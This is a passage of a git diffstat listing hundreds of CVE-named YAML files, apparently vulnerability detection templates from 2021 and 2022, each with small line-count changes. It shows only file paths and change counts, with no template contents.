http/cves/2021/CVE-2021-24387.yaml | 3 +-- http/cves/2021/CVE-2021-24389.yaml | 3 +-- http/cves/2021/CVE-2021-24406.yaml | 3 +-- http/cves/2021/CVE-2021-24407.yaml | 3 +-- http/cves/2021/CVE-2021-24409.yaml | 3 +-- http/cves/2021/CVE-2021-24435.yaml | 3 +-- http/cves/2021/CVE-2021-24436.yaml | 3 +-- http/cves/2021/CVE-2021-24452.yaml | 3 +-- http/cves/2021/CVE-2021-24472.yaml | 3 +-- http/cves/2021/CVE-2021-24488.yaml | 3 +-- http/cves/2021/CVE-2021-24495.yaml | 3 +-- http/cves/2021/CVE-2021-24498.yaml | 3 +-- http/cves/2021/CVE-2021-24499.yaml | 3 +-- http/cves/2021/CVE-2021-24510.yaml | 3 +-- http/cves/2021/CVE-2021-24554.yaml | 3 +-- http/cves/2021/CVE-2021-24627.yaml | 3 +-- http/cves/2021/CVE-2021-24647.yaml | 3 +-- http/cves/2021/CVE-2021-24666.yaml | 3 +-- http/cves/2021/CVE-2021-24731.yaml | 3 +-- http/cves/2021/CVE-2021-24746.yaml | 3 +-- http/cves/2021/CVE-2021-24750.yaml | 3 +-- http/cves/2021/CVE-2021-24762.yaml | 3 +-- http/cves/2021/CVE-2021-24791.yaml | 3 +-- http/cves/2021/CVE-2021-24827.yaml | 3 +-- http/cves/2021/CVE-2021-24838.yaml | 3 +-- http/cves/2021/CVE-2021-24875.yaml | 3 +-- http/cves/2021/CVE-2021-24891.yaml | 3 +-- http/cves/2021/CVE-2021-24910.yaml | 3 +-- http/cves/2021/CVE-2021-24915.yaml | 3 +-- http/cves/2021/CVE-2021-24917.yaml | 3 +-- http/cves/2021/CVE-2021-24926.yaml | 3 +-- http/cves/2021/CVE-2021-24931.yaml | 3 +-- http/cves/2021/CVE-2021-24940.yaml | 3 +-- http/cves/2021/CVE-2021-24946.yaml | 3 +-- http/cves/2021/CVE-2021-24947.yaml | 3 +-- http/cves/2021/CVE-2021-24956.yaml | 3 +-- http/cves/2021/CVE-2021-24970.yaml | 3 +-- http/cves/2021/CVE-2021-24979.yaml | 3 +-- http/cves/2021/CVE-2021-24987.yaml | 3 +-- http/cves/2021/CVE-2021-24991.yaml | 3 +-- http/cves/2021/CVE-2021-24997.yaml | 3 +-- http/cves/2021/CVE-2021-25003.yaml | 3 +-- http/cves/2021/CVE-2021-25008.yaml | 3 +-- http/cves/2021/CVE-2021-25016.yaml | 3 +-- http/cves/2021/CVE-2021-25028.yaml | 3 +-- http/cves/2021/CVE-2021-25033.yaml | 3 +-- http/cves/2021/CVE-2021-25052.yaml | 3 +-- http/cves/2021/CVE-2021-25055.yaml | 3 +-- http/cves/2021/CVE-2021-25063.yaml | 3 +-- http/cves/2021/CVE-2021-25065.yaml | 3 +-- http/cves/2021/CVE-2021-25067.yaml | 3 +-- http/cves/2021/CVE-2021-25074.yaml | 3 +-- http/cves/2021/CVE-2021-25075.yaml | 3 +-- http/cves/2021/CVE-2021-25078.yaml | 3 +-- http/cves/2021/CVE-2021-25079.yaml | 3 +-- http/cves/2021/CVE-2021-25085.yaml | 3 +-- http/cves/2021/CVE-2021-25099.yaml | 3 +-- http/cves/2021/CVE-2021-25104.yaml | 3 +-- http/cves/2021/CVE-2021-25111.yaml | 3 +-- http/cves/2021/CVE-2021-25112.yaml | 3 +-- http/cves/2021/CVE-2021-25114.yaml | 3 +-- http/cves/2021/CVE-2021-25118.yaml | 3 +-- http/cves/2021/CVE-2021-25120.yaml | 3 +-- http/cves/2021/CVE-2021-25296.yaml | 3 +-- http/cves/2021/CVE-2021-25297.yaml | 3 +-- http/cves/2021/CVE-2021-25899.yaml | 3 +-- http/cves/2021/CVE-2021-26085.yaml | 3 +-- http/cves/2021/CVE-2021-26247.yaml | 3 +-- http/cves/2021/CVE-2021-26475.yaml | 3 +-- http/cves/2021/CVE-2021-26598.yaml | 3 +-- http/cves/2021/CVE-2021-26702.yaml | 3 +-- http/cves/2021/CVE-2021-26710.yaml | 3 +-- http/cves/2021/CVE-2021-26723.yaml | 3 +-- http/cves/2021/CVE-2021-26812.yaml | 3 +-- http/cves/2021/CVE-2021-27124.yaml | 3 +-- http/cves/2021/CVE-2021-27132.yaml | 3 +-- http/cves/2021/CVE-2021-27309.yaml | 3 +-- http/cves/2021/CVE-2021-27310.yaml | 3 +-- http/cves/2021/CVE-2021-27314.yaml | 3 +-- http/cves/2021/CVE-2021-27315.yaml | 3 +-- http/cves/2021/CVE-2021-27316.yaml | 3 +-- http/cves/2021/CVE-2021-27319.yaml | 3 +-- http/cves/2021/CVE-2021-27320.yaml | 3 +-- http/cves/2021/CVE-2021-27330.yaml | 3 +-- http/cves/2021/CVE-2021-27358.yaml | 3 +-- http/cves/2021/CVE-2021-27519.yaml | 3 +-- http/cves/2021/CVE-2021-27520.yaml | 3 +-- http/cves/2021/CVE-2021-27651.yaml | 3 +-- http/cves/2021/CVE-2021-27670.yaml | 3 +-- http/cves/2021/CVE-2021-27909.yaml | 3 +-- http/cves/2021/CVE-2021-28149.yaml | 3 +-- http/cves/2021/CVE-2021-28150.yaml | 3 +-- http/cves/2021/CVE-2021-28164.yaml | 3 +-- http/cves/2021/CVE-2021-28169.yaml | 3 +-- http/cves/2021/CVE-2021-28377.yaml | 3 +-- http/cves/2021/CVE-2021-28937.yaml | 3 +-- http/cves/2021/CVE-2021-29006.yaml | 3 +-- http/cves/2021/CVE-2021-29156.yaml | 3 +-- http/cves/2021/CVE-2021-29203.yaml | 3 +-- http/cves/2021/CVE-2021-29441.yaml | 3 +-- http/cves/2021/CVE-2021-29484.yaml | 3 +-- http/cves/2021/CVE-2021-29490.yaml | 3 +-- http/cves/2021/CVE-2021-29622.yaml | 3 +-- http/cves/2021/CVE-2021-29625.yaml | 3 +-- http/cves/2021/CVE-2021-3002.yaml | 3 +-- http/cves/2021/CVE-2021-30049.yaml | 3 +-- http/cves/2021/CVE-2021-30128.yaml | 3 +-- http/cves/2021/CVE-2021-30134.yaml | 3 +-- http/cves/2021/CVE-2021-30151.yaml | 3 +-- http/cves/2021/CVE-2021-3017.yaml | 3 +-- http/cves/2021/CVE-2021-30175.yaml | 3 +-- http/cves/2021/CVE-2021-3019.yaml | 3 +-- http/cves/2021/CVE-2021-30213.yaml | 3 +-- http/cves/2021/CVE-2021-30497.yaml | 3 +-- http/cves/2021/CVE-2021-3110.yaml | 3 +-- http/cves/2021/CVE-2021-31195.yaml | 3 +-- http/cves/2021/CVE-2021-31537.yaml | 3 +-- http/cves/2021/CVE-2021-31581.yaml | 3 +-- http/cves/2021/CVE-2021-31589.yaml | 3 +-- http/cves/2021/CVE-2021-31602.yaml | 3 +-- http/cves/2021/CVE-2021-31682.yaml | 3 +-- http/cves/2021/CVE-2021-31805.yaml | 3 +-- http/cves/2021/CVE-2021-31856.yaml | 3 +-- http/cves/2021/CVE-2021-31862.yaml | 3 +-- http/cves/2021/CVE-2021-32030.yaml | 3 +-- http/cves/2021/CVE-2021-3223.yaml | 3 +-- http/cves/2021/CVE-2021-32305.yaml | 3 +-- http/cves/2021/CVE-2021-32618.yaml | 3 +-- http/cves/2021/CVE-2021-32789.yaml | 3 +-- http/cves/2021/CVE-2021-32820.yaml | 3 +-- http/cves/2021/CVE-2021-32853.yaml | 3 +-- http/cves/2021/CVE-2021-3293.yaml | 3 +-- http/cves/2021/CVE-2021-3297.yaml | 3 +-- http/cves/2021/CVE-2021-33044.yaml | 3 +-- http/cves/2021/CVE-2021-33357.yaml | 3 +-- http/cves/2021/CVE-2021-33564.yaml | 3 +-- http/cves/2021/CVE-2021-3374.yaml | 3 +-- http/cves/2021/CVE-2021-3377.yaml | 3 +-- http/cves/2021/CVE-2021-3378.yaml | 3 +-- http/cves/2021/CVE-2021-33807.yaml | 3 +-- http/cves/2021/CVE-2021-33851.yaml | 3 +-- http/cves/2021/CVE-2021-33904.yaml | 3 +-- http/cves/2021/CVE-2021-34370.yaml | 3 +-- http/cves/2021/CVE-2021-34473.yaml | 3 +-- http/cves/2021/CVE-2021-34621.yaml | 3 +-- http/cves/2021/CVE-2021-34640.yaml | 3 +-- http/cves/2021/CVE-2021-34643.yaml | 3 +-- http/cves/2021/CVE-2021-34805.yaml | 3 +-- http/cves/2021/CVE-2021-35250.yaml | 3 +-- http/cves/2021/CVE-2021-35265.yaml | 3 +-- http/cves/2021/CVE-2021-35323.yaml | 3 +-- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 3 +-- http/cves/2021/CVE-2021-35488.yaml | 3 +-- http/cves/2021/CVE-2021-3654.yaml | 3 +-- http/cves/2021/CVE-2021-36580.yaml | 3 +-- http/cves/2021/CVE-2021-36748.yaml | 3 +-- http/cves/2021/CVE-2021-36749.yaml | 3 +-- http/cves/2021/CVE-2021-36873.yaml | 3 +-- http/cves/2021/CVE-2021-37216.yaml | 3 +-- http/cves/2021/CVE-2021-37304.yaml | 3 +-- http/cves/2021/CVE-2021-37305.yaml | 3 +-- http/cves/2021/CVE-2021-37416.yaml | 3 +-- http/cves/2021/CVE-2021-37538.yaml | 3 +-- http/cves/2021/CVE-2021-37573.yaml | 3 +-- http/cves/2021/CVE-2021-37580.yaml | 3 +-- http/cves/2021/CVE-2021-37589.yaml | 3 +-- http/cves/2021/CVE-2021-37704.yaml | 3 +-- http/cves/2021/CVE-2021-37833.yaml | 3 +-- http/cves/2021/CVE-2021-38314.yaml | 3 +-- http/cves/2021/CVE-2021-38540.yaml | 3 +-- http/cves/2021/CVE-2021-38647.yaml | 3 +-- http/cves/2021/CVE-2021-38702.yaml | 3 +-- http/cves/2021/CVE-2021-38704.yaml | 3 +-- http/cves/2021/CVE-2021-38751.yaml | 3 +-- http/cves/2021/CVE-2021-39141.yaml | 3 +-- http/cves/2021/CVE-2021-39144.yaml | 3 +-- http/cves/2021/CVE-2021-39146.yaml | 3 +-- http/cves/2021/CVE-2021-39152.yaml | 3 +-- http/cves/2021/CVE-2021-39165.yaml | 3 +-- http/cves/2021/CVE-2021-39211.yaml | 3 +-- http/cves/2021/CVE-2021-39312.yaml | 3 +-- http/cves/2021/CVE-2021-39320.yaml | 3 +-- http/cves/2021/CVE-2021-39322.yaml | 3 +-- http/cves/2021/CVE-2021-39327.yaml | 3 +-- http/cves/2021/CVE-2021-39350.yaml | 3 +-- http/cves/2021/CVE-2021-39433.yaml | 3 +-- http/cves/2021/CVE-2021-39501.yaml | 3 +-- http/cves/2021/CVE-2021-40149.yaml | 3 +-- http/cves/2021/CVE-2021-40150.yaml | 3 +-- http/cves/2021/CVE-2021-40323.yaml | 3 +-- http/cves/2021/CVE-2021-40542.yaml | 3 +-- http/cves/2021/CVE-2021-40661.yaml | 3 +-- http/cves/2021/CVE-2021-40822.yaml | 3 +-- http/cves/2021/CVE-2021-40856.yaml | 3 +-- http/cves/2021/CVE-2021-40859.yaml | 3 +-- http/cves/2021/CVE-2021-40868.yaml | 3 +-- http/cves/2021/CVE-2021-40875.yaml | 3 +-- http/cves/2021/CVE-2021-40908.yaml | 3 +-- http/cves/2021/CVE-2021-40960.yaml | 3 +-- http/cves/2021/CVE-2021-40968.yaml | 3 +-- http/cves/2021/CVE-2021-40969.yaml | 3 +-- http/cves/2021/CVE-2021-40970.yaml | 3 +-- http/cves/2021/CVE-2021-40971.yaml | 3 +-- http/cves/2021/CVE-2021-40972.yaml | 3 +-- http/cves/2021/CVE-2021-40973.yaml | 3 +-- http/cves/2021/CVE-2021-40978.yaml | 3 +-- http/cves/2021/CVE-2021-41192.yaml | 3 +-- http/cves/2021/CVE-2021-41266.yaml | 3 +-- http/cves/2021/CVE-2021-41277.yaml | 3 +-- http/cves/2021/CVE-2021-41291.yaml | 3 +-- http/cves/2021/CVE-2021-41293.yaml | 3 +-- http/cves/2021/CVE-2021-41381.yaml | 3 +-- http/cves/2021/CVE-2021-41432.yaml | 3 +-- http/cves/2021/CVE-2021-41460.yaml | 3 +-- http/cves/2021/CVE-2021-41467.yaml | 3 +-- http/cves/2021/CVE-2021-41569.yaml | 3 +-- http/cves/2021/CVE-2021-41648.yaml | 3 +-- http/cves/2021/CVE-2021-41649.yaml | 3 +-- http/cves/2021/CVE-2021-41653.yaml | 3 +-- http/cves/2021/CVE-2021-41749.yaml | 3 +-- http/cves/2021/CVE-2021-41826.yaml | 3 +-- http/cves/2021/CVE-2021-41878.yaml | 3 +-- http/cves/2021/CVE-2021-4191.yaml | 3 +-- http/cves/2021/CVE-2021-41951.yaml | 3 +-- http/cves/2021/CVE-2021-42063.yaml | 3 +-- http/cves/2021/CVE-2021-42071.yaml | 3 +-- http/cves/2021/CVE-2021-42192.yaml | 3 +-- http/cves/2021/CVE-2021-42551.yaml | 3 +-- http/cves/2021/CVE-2021-42565.yaml | 3 +-- http/cves/2021/CVE-2021-42566.yaml | 3 +-- http/cves/2021/CVE-2021-42627.yaml | 3 +-- http/cves/2021/CVE-2021-42663.yaml | 3 +-- http/cves/2021/CVE-2021-42667.yaml | 3 +-- http/cves/2021/CVE-2021-42887.yaml | 3 +-- http/cves/2021/CVE-2021-43062.yaml | 3 +-- http/cves/2021/CVE-2021-43287.yaml | 3 +-- http/cves/2021/CVE-2021-43421.yaml | 3 +-- http/cves/2021/CVE-2021-43495.yaml | 3 +-- http/cves/2021/CVE-2021-43496.yaml | 3 +-- http/cves/2021/CVE-2021-43510.yaml | 3 +-- http/cves/2021/CVE-2021-43574.yaml | 3 +-- http/cves/2021/CVE-2021-43725.yaml | 3 +-- http/cves/2021/CVE-2021-43734.yaml | 3 +-- http/cves/2021/CVE-2021-43810.yaml | 3 +-- http/cves/2021/CVE-2021-44139.yaml | 3 +-- http/cves/2021/CVE-2021-44427.yaml | 3 +-- http/cves/2021/CVE-2021-44451.yaml | 3 +-- http/cves/2021/CVE-2021-44515.yaml | 3 +-- http/cves/2021/CVE-2021-44528.yaml | 3 +-- http/cves/2021/CVE-2021-44848.yaml | 3 +-- http/cves/2021/CVE-2021-45043.yaml | 3 +-- http/cves/2021/CVE-2021-45092.yaml | 3 +-- http/cves/2021/CVE-2021-45232.yaml | 3 +-- http/cves/2021/CVE-2021-45380.yaml | 3 +-- http/cves/2021/CVE-2021-45422.yaml | 3 +-- http/cves/2021/CVE-2021-45428.yaml | 3 +-- http/cves/2021/CVE-2021-45968.yaml | 3 +-- http/cves/2021/CVE-2021-46005.yaml | 3 +-- http/cves/2021/CVE-2021-46068.yaml | 3 +-- http/cves/2021/CVE-2021-46069.yaml | 3 +-- http/cves/2021/CVE-2021-46071.yaml | 3 +-- http/cves/2021/CVE-2021-46072.yaml | 3 +-- http/cves/2021/CVE-2021-46073.yaml | 3 +-- http/cves/2021/CVE-2021-46107.yaml | 3 +-- http/cves/2021/CVE-2021-46379.yaml | 3 +-- http/cves/2021/CVE-2021-46381.yaml | 3 +-- http/cves/2021/CVE-2021-46387.yaml | 3 +-- http/cves/2021/CVE-2021-46417.yaml | 3 +-- http/cves/2021/CVE-2021-46424.yaml | 3 +-- http/cves/2021/CVE-2021-46704.yaml | 3 +-- http/cves/2022/CVE-2022-0140.yaml | 3 +-- http/cves/2022/CVE-2022-0147.yaml | 3 +-- http/cves/2022/CVE-2022-0148.yaml | 3 +-- http/cves/2022/CVE-2022-0149.yaml | 3 +-- http/cves/2022/CVE-2022-0150.yaml | 3 +-- http/cves/2022/CVE-2022-0165.yaml | 3 +-- http/cves/2022/CVE-2022-0169.yaml | 3 +-- http/cves/2022/CVE-2022-0189.yaml | 3 +-- http/cves/2022/CVE-2022-0201.yaml | 3 +-- http/cves/2022/CVE-2022-0206.yaml | 3 +-- http/cves/2022/CVE-2022-0208.yaml | 3 +-- http/cves/2022/CVE-2022-0212.yaml | 3 +-- http/cves/2022/CVE-2022-0218.yaml | 3 +-- http/cves/2022/CVE-2022-0220.yaml | 3 +-- http/cves/2022/CVE-2022-0228.yaml | 3 +-- http/cves/2022/CVE-2022-0234.yaml | 3 +-- http/cves/2022/CVE-2022-0271.yaml | 3 +-- http/cves/2022/CVE-2022-0281.yaml | 3 +-- http/cves/2022/CVE-2022-0288.yaml | 3 +-- http/cves/2022/CVE-2022-0346.yaml | 3 +-- http/cves/2022/CVE-2022-0349.yaml | 3 +-- http/cves/2022/CVE-2022-0378.yaml | 3 +-- http/cves/2022/CVE-2022-0381.yaml | 3 +-- http/cves/2022/CVE-2022-0412.yaml | 3 +-- http/cves/2022/CVE-2022-0415.yaml | 3 +-- http/cves/2022/CVE-2022-0422.yaml | 3 +-- http/cves/2022/CVE-2022-0432.yaml | 3 +-- http/cves/2022/CVE-2022-0434.yaml | 3 +-- http/cves/2022/CVE-2022-0437.yaml | 3 +-- http/cves/2022/CVE-2022-0482.yaml | 3 +-- http/cves/2022/CVE-2022-0533.yaml | 3 +-- http/cves/2022/CVE-2022-0535.yaml | 3 +-- http/cves/2022/CVE-2022-0540.yaml | 3 +-- http/cves/2022/CVE-2022-0591.yaml | 3 +-- http/cves/2022/CVE-2022-0594.yaml | 3 +-- http/cves/2022/CVE-2022-0595.yaml | 3 +-- http/cves/2022/CVE-2022-0597.yaml | 3 +-- http/cves/2022/CVE-2022-0599.yaml | 3 +-- http/cves/2022/CVE-2022-0651.yaml | 3 +-- http/cves/2022/CVE-2022-0656.yaml | 3 +-- http/cves/2022/CVE-2022-0658.yaml | 3 +-- http/cves/2022/CVE-2022-0660.yaml | 3 +-- http/cves/2022/CVE-2022-0678.yaml | 3 +-- http/cves/2022/CVE-2022-0692.yaml | 3 +-- http/cves/2022/CVE-2022-0693.yaml | 3 +-- http/cves/2022/CVE-2022-0747.yaml | 3 +-- http/cves/2022/CVE-2022-0760.yaml | 3 +-- http/cves/2022/CVE-2022-0769.yaml | 3 +-- http/cves/2022/CVE-2022-0773.yaml | 3 +-- http/cves/2022/CVE-2022-0776.yaml | 3 +-- http/cves/2022/CVE-2022-0781.yaml | 3 +-- http/cves/2022/CVE-2022-0784.yaml | 3 +-- http/cves/2022/CVE-2022-0785.yaml | 3 +-- http/cves/2022/CVE-2022-0786.yaml | 3 +-- http/cves/2022/CVE-2022-0788.yaml | 3 +-- http/cves/2022/CVE-2022-0814.yaml | 3 +-- http/cves/2022/CVE-2022-0817.yaml | 3 +-- http/cves/2022/CVE-2022-0826.yaml | 3 +-- http/cves/2022/CVE-2022-0827.yaml | 3 +-- http/cves/2022/CVE-2022-0846.yaml | 3 +-- http/cves/2022/CVE-2022-0864.yaml | 3 +-- http/cves/2022/CVE-2022-0867.yaml | 3 +-- http/cves/2022/CVE-2022-0869.yaml | 3 +-- http/cves/2022/CVE-2022-0870.yaml | 3 +-- http/cves/2022/CVE-2022-0885.yaml | 3 +-- http/cves/2022/CVE-2022-0899.yaml | 3 +-- http/cves/2022/CVE-2022-0928.yaml | 3 +-- http/cves/2022/CVE-2022-0948.yaml | 3 +-- http/cves/2022/CVE-2022-0949.yaml | 3 +-- http/cves/2022/CVE-2022-0952.yaml | 3 +-- http/cves/2022/CVE-2022-0954.yaml | 3 +-- http/cves/2022/CVE-2022-0963.yaml | 3 +-- http/cves/2022/CVE-2022-0968.yaml | 3 +-- http/cves/2022/CVE-2022-1007.yaml | 3 +-- http/cves/2022/CVE-2022-1013.yaml | 3 +-- http/cves/2022/CVE-2022-1020.yaml | 3 +-- http/cves/2022/CVE-2022-1057.yaml | 3 +-- http/cves/2022/CVE-2022-1058.yaml | 3 +-- http/cves/2022/CVE-2022-1168.yaml | 3 +-- http/cves/2022/CVE-2022-1221.yaml | 3 +-- http/cves/2022/CVE-2022-1329.yaml | 3 +-- http/cves/2022/CVE-2022-1391.yaml | 3 +-- http/cves/2022/CVE-2022-1392.yaml | 3 +-- http/cves/2022/CVE-2022-1398.yaml | 3 +-- http/cves/2022/CVE-2022-1439.yaml | 3 +-- http/cves/2022/CVE-2022-1442.yaml | 3 +-- http/cves/2022/CVE-2022-1574.yaml | 3 +-- http/cves/2022/CVE-2022-1595.yaml | 3 +-- http/cves/2022/CVE-2022-1597.yaml | 3 +-- http/cves/2022/CVE-2022-1598.yaml | 3 +-- http/cves/2022/CVE-2022-1713.yaml | 3 +-- http/cves/2022/CVE-2022-1724.yaml | 3 +-- http/cves/2022/CVE-2022-1756.yaml | 3 +-- http/cves/2022/CVE-2022-1768.yaml | 3 +-- http/cves/2022/CVE-2022-1815.yaml | 3 +-- http/cves/2022/CVE-2022-1883.yaml | 3 +-- http/cves/2022/CVE-2022-1903.yaml | 3 +-- http/cves/2022/CVE-2022-1904.yaml | 3 +-- http/cves/2022/CVE-2022-1906.yaml | 3 +-- http/cves/2022/CVE-2022-1910.yaml | 3 +-- http/cves/2022/CVE-2022-1916.yaml | 3 +-- http/cves/2022/CVE-2022-1933.yaml | 3 +-- http/cves/2022/CVE-2022-1937.yaml | 3 +-- http/cves/2022/CVE-2022-1946.yaml | 3 +-- http/cves/2022/CVE-2022-1952.yaml | 3 +-- http/cves/2022/CVE-2022-2034.yaml | 3 +-- http/cves/2022/CVE-2022-21371.yaml | 3 +-- http/cves/2022/CVE-2022-21500.yaml | 3 +-- http/cves/2022/CVE-2022-21587.yaml | 3 +-- http/cves/2022/CVE-2022-21661.yaml | 3 +-- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 3 +-- http/cves/2022/CVE-2022-2187.yaml | 3 +-- http/cves/2022/CVE-2022-2219.yaml | 3 +-- http/cves/2022/CVE-2022-22242.yaml | 3 +-- http/cves/2022/CVE-2022-22536.yaml | 3 +-- http/cves/2022/CVE-2022-22733.yaml | 3 +-- http/cves/2022/CVE-2022-22897.yaml | 3 +-- http/cves/2022/CVE-2022-2290.yaml | 3 +-- http/cves/2022/CVE-2022-22963.yaml | 3 +-- http/cves/2022/CVE-2022-22972.yaml | 3 +-- http/cves/2022/CVE-2022-23102.yaml | 3 +-- http/cves/2022/CVE-2022-23134.yaml | 3 +-- http/cves/2022/CVE-2022-2314.yaml | 3 +-- http/cves/2022/CVE-2022-23178.yaml | 3 +-- http/cves/2022/CVE-2022-23347.yaml | 3 +-- http/cves/2022/CVE-2022-23348.yaml | 3 +-- http/cves/2022/CVE-2022-23544.yaml | 3 +-- http/cves/2022/CVE-2022-2373.yaml | 3 +-- http/cves/2022/CVE-2022-2376.yaml | 3 +-- http/cves/2022/CVE-2022-23779.yaml | 3 +-- http/cves/2022/CVE-2022-2379.yaml | 3 +-- http/cves/2022/CVE-2022-23808.yaml | 3 +-- http/cves/2022/CVE-2022-2383.yaml | 3 +-- http/cves/2022/CVE-2022-23854.yaml | 3 +-- http/cves/2022/CVE-2022-23881.yaml | 3 +-- http/cves/2022/CVE-2022-23898.yaml | 3 +-- http/cves/2022/CVE-2022-23944.yaml | 3 +-- http/cves/2022/CVE-2022-24124.yaml | 3 +-- http/cves/2022/CVE-2022-24129.yaml | 3 +-- http/cves/2022/CVE-2022-2414.yaml | 3 +-- http/cves/2022/CVE-2022-24181.yaml | 3 +-- http/cves/2022/CVE-2022-24223.yaml | 3 +-- http/cves/2022/CVE-2022-24264.yaml | 3 +-- http/cves/2022/CVE-2022-24265.yaml | 3 +-- http/cves/2022/CVE-2022-24266.yaml | 3 +-- http/cves/2022/CVE-2022-24288.yaml | 3 +-- http/cves/2022/CVE-2022-24384.yaml | 3 +-- http/cves/2022/CVE-2022-2462.yaml | 3 +-- http/cves/2022/CVE-2022-2467.yaml | 3 +-- http/cves/2022/CVE-2022-24681.yaml | 3 +-- http/cves/2022/CVE-2022-24816.yaml | 3 +-- http/cves/2022/CVE-2022-2486.yaml | 3 +-- http/cves/2022/CVE-2022-24899.yaml | 3 +-- http/cves/2022/CVE-2022-24900.yaml | 3 +-- http/cves/2022/CVE-2022-24990.yaml | 3 +-- http/cves/2022/CVE-2022-25082.yaml | 3 +-- http/cves/2022/CVE-2022-25125.yaml | 3 +-- http/cves/2022/CVE-2022-25148.yaml | 3 +-- http/cves/2022/CVE-2022-25149.yaml | 3 +-- http/cves/2022/CVE-2022-25216.yaml | 3 +-- http/cves/2022/CVE-2022-25323.yaml | 3 +-- http/cves/2022/CVE-2022-2535.yaml | 3 +-- http/cves/2022/CVE-2022-25356.yaml | 3 +-- http/cves/2022/CVE-2022-2544.yaml | 3 +-- http/cves/2022/CVE-2022-2546.yaml | 3 +-- http/cves/2022/CVE-2022-25481.yaml | 3 +-- http/cves/2022/CVE-2022-25485.yaml | 3 +-- http/cves/2022/CVE-2022-25486.yaml | 3 +-- http/cves/2022/CVE-2022-25488.yaml | 3 +-- http/cves/2022/CVE-2022-25489.yaml | 3 +-- http/cves/2022/CVE-2022-25497.yaml | 3 +-- http/cves/2022/CVE-2022-2551.yaml | 3 +-- http/cves/2022/CVE-2022-25568.yaml | 3 +-- http/cves/2022/CVE-2022-2599.yaml | 3 +-- http/cves/2022/CVE-2022-26138.yaml | 3 +-- http/cves/2022/CVE-2022-26148.yaml | 3 +-- http/cves/2022/CVE-2022-26159.yaml | 3 +-- http/cves/2022/CVE-2022-26233.yaml | 3 +-- http/cves/2022/CVE-2022-26263.yaml | 3 +-- http/cves/2022/CVE-2022-2627.yaml | 3 +-- http/cves/2022/CVE-2022-2633.yaml | 3 +-- http/cves/2022/CVE-2022-26564.yaml | 3 +-- http/cves/2022/CVE-2022-26833.yaml | 3 +-- http/cves/2022/CVE-2022-2756.yaml | 3 +-- http/cves/2022/CVE-2022-27593.yaml | 3 +-- http/cves/2022/CVE-2022-27849.yaml | 3 +-- http/cves/2022/CVE-2022-27926.yaml | 3 +-- http/cves/2022/CVE-2022-27927.yaml | 3 +-- http/cves/2022/CVE-2022-27984.yaml | 3 +-- http/cves/2022/CVE-2022-27985.yaml | 3 +-- http/cves/2022/CVE-2022-28022.yaml | 3 +-- http/cves/2022/CVE-2022-28023.yaml | 3 +-- http/cves/2022/CVE-2022-28032.yaml | 3 +-- http/cves/2022/CVE-2022-28079.yaml | 3 +-- http/cves/2022/CVE-2022-28080.yaml | 3 +-- http/cves/2022/CVE-2022-28117.yaml | 3 +-- http/cves/2022/CVE-2022-28290.yaml | 3 +-- http/cves/2022/CVE-2022-28363.yaml | 3 +-- http/cves/2022/CVE-2022-28365.yaml | 3 +-- http/cves/2022/CVE-2022-2863.yaml | 3 +-- http/cves/2022/CVE-2022-28923.yaml | 3 +-- http/cves/2022/CVE-2022-28955.yaml | 3 +-- http/cves/2022/CVE-2022-29004.yaml | 3 +-- http/cves/2022/CVE-2022-29005.yaml | 3 +-- http/cves/2022/CVE-2022-29006.yaml | 3 +-- http/cves/2022/CVE-2022-29007.yaml | 3 +-- http/cves/2022/CVE-2022-29009.yaml | 3 +-- http/cves/2022/CVE-2022-29014.yaml | 3 +-- http/cves/2022/CVE-2022-29078.yaml | 3 +-- http/cves/2022/CVE-2022-29153.yaml | 3 +-- http/cves/2022/CVE-2022-29272.yaml | 3 +-- http/cves/2022/CVE-2022-29298.yaml | 3 +-- http/cves/2022/CVE-2022-29349.yaml | 3 +-- http/cves/2022/CVE-2022-29455.yaml | 3 +-- http/cves/2022/CVE-2022-29548.yaml | 3 +-- http/cves/2022/CVE-2022-29775.yaml | 3 +-- http/cves/2022/CVE-2022-30073.yaml | 3 +-- http/cves/2022/CVE-2022-30489.yaml | 3 +-- http/cves/2022/CVE-2022-30512.yaml | 3 +-- http/cves/2022/CVE-2022-30513.yaml | 3 +-- http/cves/2022/CVE-2022-30514.yaml | 3 +-- http/cves/2022/CVE-2022-3062.yaml | 3 +-- http/cves/2022/CVE-2022-30776.yaml | 3 +-- http/cves/2022/CVE-2022-30777.yaml | 3 +-- http/cves/2022/CVE-2022-31268.yaml | 3 +-- http/cves/2022/CVE-2022-31269.yaml | 3 +-- http/cves/2022/CVE-2022-31299.yaml | 3 +-- http/cves/2022/CVE-2022-31373.yaml | 3 +-- http/cves/2022/CVE-2022-3142.yaml | 3 +-- http/cves/2022/CVE-2022-31474.yaml | 3 +-- http/cves/2022/CVE-2022-31499.yaml | 3 +-- http/cves/2022/CVE-2022-31798.yaml | 3 +-- http/cves/2022/CVE-2022-31814.yaml | 3 +-- http/cves/2022/CVE-2022-31845.yaml | 3 +-- http/cves/2022/CVE-2022-31846.yaml | 3 +-- http/cves/2022/CVE-2022-31847.yaml | 3 +-- http/cves/2022/CVE-2022-31854.yaml | 3 +-- http/cves/2022/CVE-2022-31879.yaml | 3 +-- http/cves/2022/CVE-2022-31974.yaml | 3 +-- http/cves/2022/CVE-2022-31975.yaml | 3 +-- http/cves/2022/CVE-2022-31976.yaml | 3 +-- http/cves/2022/CVE-2022-31977.yaml | 3 +-- http/cves/2022/CVE-2022-31978.yaml | 3 +-- http/cves/2022/CVE-2022-31980.yaml | 3 +-- http/cves/2022/CVE-2022-31981.yaml | 3 +-- http/cves/2022/CVE-2022-31982.yaml | 3 +-- http/cves/2022/CVE-2022-31983.yaml | 3 +-- http/cves/2022/CVE-2022-31984.yaml | 3 +-- http/cves/2022/CVE-2022-32007.yaml | 3 +-- http/cves/2022/CVE-2022-32015.yaml | 3 +-- http/cves/2022/CVE-2022-32018.yaml | 3 +-- http/cves/2022/CVE-2022-32022.yaml | 3 +-- http/cves/2022/CVE-2022-32024.yaml | 3 +-- http/cves/2022/CVE-2022-32025.yaml | 3 +-- http/cves/2022/CVE-2022-32026.yaml | 3 +-- http/cves/2022/CVE-2022-32028.yaml | 3 +-- http/cves/2022/CVE-2022-32094.yaml | 3 +-- http/cves/2022/CVE-2022-32195.yaml | 3 +-- http/cves/2022/CVE-2022-32409.yaml | 3 +-- http/cves/2022/CVE-2022-3242.yaml | 3 +-- http/cves/2022/CVE-2022-32429.yaml | 3 +-- http/cves/2022/CVE-2022-32444.yaml | 3 +-- http/cves/2022/CVE-2022-32770.yaml | 3 +-- http/cves/2022/CVE-2022-32771.yaml 